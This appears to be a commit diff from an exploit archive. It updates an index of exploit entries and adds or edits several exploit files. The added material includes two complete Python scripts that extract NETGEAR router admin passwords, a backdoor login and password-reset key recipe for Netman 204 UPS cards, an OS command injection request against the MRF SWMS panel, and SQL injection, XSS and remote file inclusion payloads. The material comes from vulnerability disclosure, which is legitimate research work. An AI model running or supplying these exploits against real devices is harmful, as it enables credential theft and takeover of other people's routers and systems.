30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0
30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote,0
@ -20650,7 +20651,7 @@ id,file,description,date,author,platform,type,port
7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - 'id' Parameter Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,asp,webapps,0
7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0
7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
7965,platforms/php/webapps/7965.txt,"Technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps,0
7968,platforms/php/webapps/7968.php,"DreamPics Photo/Video Gallery - Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
7969,platforms/php/webapps/7969.txt,"Flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0
@ -26907,9 +26908,9 @@ id,file,description,date,author,platform,type,port
24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0
24252,platforms/cgi/webapps/24252.txt,"fastream netfile ftp/web server 6.5/6.7 - Directory Traversal",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0
24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 - Email Header HTML Injection",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0
24255,platforms/php/webapps/24255.txt,"JAWS 0.2/0.3 - 'index.php' gadget Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0
24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0
24257,platforms/php/webapps/24257.txt,"JAWS 0.2/0.3 - 'index.php' action Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0
24255,platforms/php/webapps/24255.txt,"Jaws 0.2/0.3 - 'gadget' Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0
24256,platforms/php/webapps/24256.php,"Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0
24257,platforms/php/webapps/24257.txt,"Jaws 0.2/0.3 - 'action' Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0
24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0
24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0
24269,platforms/php/webapps/24269.txt,"NConf 1.3 - 'detail.php detail_admin_items.php id Parameter' SQL Injection",2013-01-21,haidao,php,webapps,0
@ -26950,7 +26951,7 @@ id,file,description,date,author,platform,type,port
24331,platforms/php/webapps/24331.txt,"Phorum 5.0.7 - Search Script Cross-Site Scripting",2004-07-28,vampz,php,webapps,0
24332,platforms/php/webapps/24332.txt,"Comersus Cart 5.0 - SQL Injection",2004-07-29,evol@ruiner.halo.nu,php,webapps,0
24333,platforms/php/webapps/24333.txt,"Verylost LostBook 1.1 - Message Entry HTML Injection",2004-07-29,"Joseph Moniz",php,webapps,0
24334,platforms/php/webapps/24334.txt,"JAWS 0.2/0.3/0.4 - ControlPanel.php SQL Injection",2004-07-29,"Fernando Quintero",php,webapps,0
24334,platforms/php/webapps/24334.txt,"Jaws 0.2/0.3/0.4 - ControlPanel.php SQL Injection",2004-07-29,"Fernando Quintero",php,webapps,0
24340,platforms/php/webapps/24340.txt,"PowerPortal 1.1/1.3 - Private Message HTML Injection",2004-07-30,vampz,php,webapps,0
24341,platforms/php/webapps/24341.txt,"Fusionphp Fusion News 3.3/3.6 - Administrator Command Execution",2004-07-30,"Joseph Moniz",php,webapps,0
24347,platforms/cgi/webapps/24347.txt,"Pete Stein GoScript 2.0 - Remote Command Execution",2004-08-04,"Francisco Alisson",cgi,webapps,0
@ -27757,7 +27758,7 @@ id,file,description,date,author,platform,type,port
25735,platforms/php/webapps/25735.txt,"BookReview 1.0 - suggest_review.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0
25738,platforms/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0
25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0
25740,platforms/php/webapps/25740.txt,"JAWS Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0
25740,platforms/php/webapps/25740.txt,"Jaws Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0
25741,platforms/php/webapps/25741.bat,"Invision Power Board 1.x - Unauthorized Access",2005-05-28,V[i]RuS,php,webapps,0
25742,platforms/php/webapps/25742.txt,"NPDS 4.8 < 5.0 - admin.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0
25743,platforms/php/webapps/25743.txt,"NPDS 4.8 < 5.0 - powerpack_f.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0
@ -27936,7 +27937,7 @@ id,file,description,date,author,platform,type,port
25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 - Read.cgi Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps,0
25940,platforms/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 - 'index.php' Cross-Site Scripting",2005-07-05,mozako,php,webapps,0
25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 - Form.Inc.php3 Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0
25942,platforms/php/webapps/25942.txt,"JAWS 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0
25942,platforms/php/webapps/25942.txt,"Jaws 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0
25945,platforms/php/webapps/25945.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal",2005-07-06,"Diabolic Crab",php,webapps,0
25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System - Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0
25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling",2005-07-06,c0ntex,cgi,webapps,0
@ -33846,7 +33847,7 @@ id,file,description,date,author,platform,type,port
34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0
34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting",2014-10-09,"Frank Lycops",multiple,webapps,0
34930,platforms/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 - 'default.aspx' Cross-Site Scripting",2009-06-03,intern0t,php,webapps,0
34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0
34933,platforms/php/webapps/34933.txt,"Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0
34934,platforms/php/webapps/34934.pl,"Joomla! Component Projects 'com_projects' - SQL Injection / Local File Inclusion",2010-10-27,jos_ali_joe,php,webapps,0
34935,platforms/php/webapps/34935.txt,"LES PACKS - 'ID' Parameter SQL Injection",2010-10-27,Cru3l.b0y,php,webapps,0
34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 - 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0
@ -37133,6 +37134,9 @@ id,file,description,date,author,platform,type,port
41198,platforms/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
41199,platforms/php/webapps/41199.txt,"Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41200,platforms/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps,0
41205,platforms/hardware/webapps/41205.py,"Multiple Netgear Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",hardware,webapps,0
41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
41202,platforms/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
41204,platforms/php/webapps/41204.txt,"Video Sharing Script 4.94 - 'uid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
41208,platforms/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",hardware,webapps,0

Can't render this file because it is too large.

View file

@ -12,48 +12,43 @@ Discovery: Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
-----------------------------------------------------------------------------------------
Vulnerability Details:
The MRF Web Administration Panel (SWMS) is vulnerable to OS Command Injection
The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
attacks.
Affected parameter: MSM_MACRO_NAME (POST parameter)
Affected file: ms.cgi (/swms/ms.cgi)
Verified Affected Operation: Show Fatal Error and Log Package Configuration
> Affected parameter: MSM_MACRO_NAME (POST parameter)
> Affected file: ms.cgi (/swms/ms.cgi)
> Verified Affected Operation: Show Fatal Error and Log Package Configuration
It is possible to use the pipe character (|) to inject arbitrary OS commands
and retrieve the output in the application's responses.
and retrieve the output in the application's responses:
MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
Proof Of Concept:
The attacker can login to the web panel as a standard user (non-administrator account)
and inject the POST parameter: MSM_MACRO_NAME with the following
payload: Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
As a result the attacker receives the result of the command in the application response
In order to reproduce the vulnerability:
1. Login to the vulnerable MRF SWMS web panel as a standard user (non-administrator):
https://vulnsite.com/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc), set your session id
and send the following POST request in order to retrieve the output of the 'pwd' command:
1. Login to the vulnerable MRF web panel (with a standard user account):
https://<vulnerable>/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)
3. Modify and send the following POST request:
POST /swms/ms.cgi HTTP/1.1
Host: vulnhost
Host: <vulnerable>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://vulnsite/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
3. You can see the output of the command 'pwd' in the server response:
4. Check the output of the injected command 'pwd' in the response:
HTTP/1.1 200 OK
Date: Thu, 21 Jul 2016 08:18:43 GMT
@ -75,4 +70,4 @@ as a platform for attacks against other systems.
Disclaimer:
The responsible disclosure policy has been followed
The responsible disclosure policy has been followed

View file

@ -0,0 +1,358 @@
Trustwave SpiderLabs Security Advisory TWSL2017-003:
Multiple Vulnerabilities in NETGEAR Routers
Published: 01/30/2017
Version: 1.0
Vendor: NETGEAR (http://www.netgear.com/)
Product: Multiple products
Finding 1: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected:
# AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
# D6400 V1.0.0.34_1.3.34
# D6400 V1.0.0.38_1.1.38
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.30_10.0.73
# R6700 V1.0.1.14_10.0.29 (Latest beta)
# R6700 V1.0.0.26_10.0.26 (Latest stable)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.26_1.0.41
# R8500 V1.0.0.56_1.0.28
# R8500 V1.0.0.20_1.0.11
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.29_1.0.29
# VEGN2610 V1.0.0.27_1.0.27
# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.42_1.0.25
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# WN3100RP V1.0.0.14_1.0.19 (Latest)
# WN3100RP V1.0.0.6_1.0.12
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13
Product description:
Multiple Netgear Routers
Many Netgear routers are prone to password disclosure via simple crafted
requests to the web management server. The bug is exploitable remotely if the
remote management option is set and can also be exploited given access to the
router over LAN or WLAN.
When trying to access the web panel a user is asked to authenticate, if the
authentication is cancelled and password recovery is not enabled, the user is
redirected to a page which exposes a password recovery token. If a user
supplies the correct token to the page
http://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not
enabled), they will receive the admin password for the router.
If password recovery is set the exploit will fail, as it will ask the user for the recovery
questions which were previously set when enabling the feature, this is
persistent, even after disabling the recovery option the exploit will fail,
because the router will ask for the security questions.
This can easily be reproduced using the attached poc, or by sending these two
simple requests via the browser:
1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token
2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)
## netgore.py
import sys
import requests
def scrape(text, start_trig, end_trig):
if text.find(start_trig) != -1:
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
else:
return "i_dont_speak_english"
#disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
#1st stage - get token
ip = sys.argv[1]
port = sys.argv[2]
url = 'http://' + ip + ':' + port + '/'
try:
r = requests.get(url)
except:
url = 'https://' + ip + ':' + port + '/'
r = requests.get(url, verify=False)
model = r.headers.get('WWW-Authenticate')
if model is not None:
print "Attcking: " + model[13:-1]
else:
print "not a netgear router"
sys.exit(0)
token = scrape(r.text, 'unauth.cgi?id=', '\"')
if token == 'i_dont_speak_english':
print "not vulnerable"
sys.exit(0)
print "token found: " + token
#2nd stage - pass the token - get the password
url = url + 'passwordrecovered.cgi?id=' + token
r = requests.post(url, verify=False)
#profit
if r.text.find('left\">') != -1:
username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
username = scrape(username, '>', '\'')
password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
password = scrape(password, '>', '\'')
if username == "i_dont_speak_english":
username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
else:
print "not vulnerable becuse password recovery IS set"
sys.exit(0)
#html encoding pops out of nowhere, lets replace that
password = password.replace("&#35;","#")
password = password.replace("&","&")
print "user: " + username
print "pass: " + password
================================
Just run the PoC against a router to get the credentials if it is vulnerable.
Finding 2: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected:
# AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6300 V1.0.0.96_1.1.96 (Latest)
# D6300B V1.0.0.36_1.0.36
# D6300B V1.0.0.32_1.0.32
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.76_1.0.76 (Latest)
# DGN2200v4 V1.0.0.66_1.0.66
# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.56_1.0.43 (Latest)
# R6200 V1.0.1.52_1.0.41
# R6200 V1.0.1.48_1.0.37
# R6200v2 V1.0.3.10_10.1.10 (Latest)
# R6200v2 V1.0.1.20_1.0.18
# R6250 V1.0.4.6_10.1.12 (Latest beta)
# R6250 V1.0.4.2_10.1.10 (Latest stable)
# R6250 V1.0.1.84_1.0.78
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
# R6700 V1.0.0.26_10.0.26 (Latest)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R7000 V1.0.4.30_1.1.67
# R7900 V1.0.1.8_10.0.14 (Latest beta)
# R7900 V1.0.1.4_10.0.12 (Latest stable)
# R7900 V1.0.0.10_10.0.7
# R7900 V1.0.0.8_10.0.5
# R7900 V1.0.0.6_10.0.4
# R8000 V1.0.3.26_1.1.18 (Latest beta)
# R8000 V1.0.3.4_1.1.2 (Latest stable)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.30_1.0.43
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.27_1.0.27
# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
# VEVG2660 V1.0.0.23_1.0.23
# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
# WNDR3400v3 V1.0.1.2_1.0.51
# WNDR3400v3 V1.0.0.22_1.0.29
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500 V1.0.1.6_1.0.24
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.50_1.0.30
# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
# WNR1000v3 V1.0.2.62_60.0.87 (Latest)
# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
# WNR3500Lv2 V1.2.0.32_40.0.74
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13
Many Netgear routers are prone to password disclosure via simple crafted
request to the web management server. The bug is exploitable remotely if the
remote management option is set and can also be exploited given access to the
router over LAN or WLAN.
Netgear routers have an option to restore forgotten password via 2 security
questions. If the recovery option is disabled (which is the default), it is
still possible to recover the password by sending a correct token to the
recovery page.
If a user supplies the correct token to the page
http://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not
enabled), they will receive the admin password for the router. If password
recovery is set the exploit will fail, as it will ask the user for the recovery
questions which were previously set when enabling the feature, this is
persistent, even after disabling the recovery option, the exploit will fail,
because the router will ask for the security questions.
This mechanism does not work correctly on the very first request to
"passwordrecovered.cgi" and the token is not properly checked, this means that
any TOKEN value will result in disclosure of the password.
The issue occurs after every reboot of the router.
This can easily be reproduced using the attached poc, or by sending a simple
request via the browser:
1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)
## netgore2.py
import sys
import requests
def scrape(text, start_trig, end_trig):
if text.find(start_trig) != -1:
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
else:
return "i_dont_speak_english"
#disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
#1st stage
ip = sys.argv[1]
port = sys.argv[2]
url = 'http://' + ip + ':' + port + '/'
try:
r = requests.get(url)
except:
url = 'https://' + ip + ':' + port + '/'
r = requests.get(url, verify=False)
model = r.headers.get('WWW-Authenticate')
if model is not None:
print "Attcking: " + model[13:-1]
else:
print "not a netgear router"
sys.exit(0)
#2nd stage
url = url + 'passwordrecovered.cgi?id=get_rekt'
try:
r = requests.post(url, verify=False)
except:
print "not vulnerable router"
sys.exit(0)
#profit
if r.text.find('left\">') != -1:
username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
username = scrape(username, '>', '\'')
password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
password = scrape(password, '>', '\'')
if username == "i_dont_speak_english":
username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
else:
print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"
sys.exit(0)
#html encoding pops out of nowhere, lets replace that
password = password.replace("&#35;","#")
password = password.replace("&","&")
print "user: " + username
print "pass: " + password
================================
Just run the PoC against a router to get the credentials if it is vulnerable.
Remediation Steps:
Please see NETGEAR's KBA for list of firmware patches for various models. As a
workaround, the bug only works when password recovery is NOT set. If you do set
password recovery this is not exploitable.
Revision History:
04/06/2016 - Vulnerability disclosed to vendor
04/19/2016 - Request for update and received confirmation of receipt of the advisories
05/18/2016 - Request for update; no response
07/14/2016 - Request for update
07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage
10/17/2016 - Request for update
12/15/2016 - Notice of intent to publish advisories
01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd
01/30/2017 - Advisory published
References
1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html
2. https://www.exploit-db.com/exploits/32883/
3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

View file

@ -0,0 +1,45 @@
# Exploit Title: Netman 204 Backdoor and weak password recovery function
# Google Dork: intitle:"Netman 204 login"
# Date: 31st Jan 2017
# Exploit Author: Simon Gurney
# Vendor Homepage: blog.synack.co.uk
# Software Link: http://www.riello-ups.co.uk/uploads/file/319/1319/FW058-0105__FW_B0225_NetMan_204_.zip
# Version: S14-1 and S15-2
# Tested on: Reillo UPS
# CVE : N/A
Netman 204 cards have a backdoor account eurek:eurek.
This account can be logged with by simply browsing to the URL
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
Due to flaws in parameter validation, the URL can be shortened to:
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
This backdoor has previously been reported by Saeed reza Zamanian under EDB-ID: 40431 here<https://www.exploit-db.com/exploits/40431/>, which shows how to utilise this to gain shell access however this did not give detail of how easy it is to log in to the device and access the administrative functions via the web interface. The google dork provided also reveals some UPS exposed to the internet.
If an admin has changed the passwords, they can be reset by generating a reset key from the MAC address if you are on the same subnet:
NETMANID=204:`/sbin/ifconfig eth0 | awk '/HWaddr/ {print $NF}' `
KEY=`echo .$NETMANID | md5sum | cut -c2-10`
To generate the key, do an MD5 hash of 204:[MAC ADDRESS]
Such as,
204:AA:BB:CC:DD:EE:FF == 0354a655811843aab718cfcf973c7dab
Then take characters 2-10, where position 1 is character 1 (not 0).
Such as,
354a65581
Then browse to the url:
http://[ip]/cgi-bin/recover2.cgi?password=354a65581
or
https://[ip]/cgi-bin/recover2.cgi?password=354a65581
Passwords have now been reset.

View file

@ -8,5 +8,4 @@ This may facilitate the theft of cookie-based authentication credentials as well
JAWS versions 0.4 and 0.5 and subsequent are reportedly vulnerable.
http://www.example.com/index.php?gadget=Glossary&action=ViewTerm&term=<script
src=some script</script>
http://www.example.com/index.php?gadget=Glossary&action=ViewTerm&term=<script src=some script</script>

View file

@ -4,5 +4,4 @@ JAWS is prone to a remote file include vulnerability. This issue is due to a fai
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/[path]/gadgets/Blog/BlogModel.php?path=
http://www.example.com
http://www.example.com/[path]/gadgets/Blog/BlogModel.php?path=http://www.example.com

View file

@ -1,7 +1,6 @@
# Exploit Title: WP Private Messages 1.0.1 Plugin WordPress Sql Injection
# Exploit Title: WP Email Users 1.4.1 Plugin WordPress Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
# Software Link: https://wordpress.org/plugins/wp-email-users/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
@ -11,7 +10,7 @@
1 - Description:
Type user access: is accessible for any registered user
Type user access: is accessible for any registered user
$_REQUEST[edit] is escaped wrong. Attack with Sql Injection
@ -24,15 +23,14 @@ http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wor
2 Using:
<form action="http://localhost:8080/wp-admin/admin-ajax.php" method="post">
<input type="text" name="action" value="weu_my_action">
<input type="text" name="filetitle" value="0 UNION SELECT
CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1">
<input type="text" name="temp_sel_key" value="select_temp">
<input type="submit" name="">
<input type="text" name="action" value="weu_my_action">
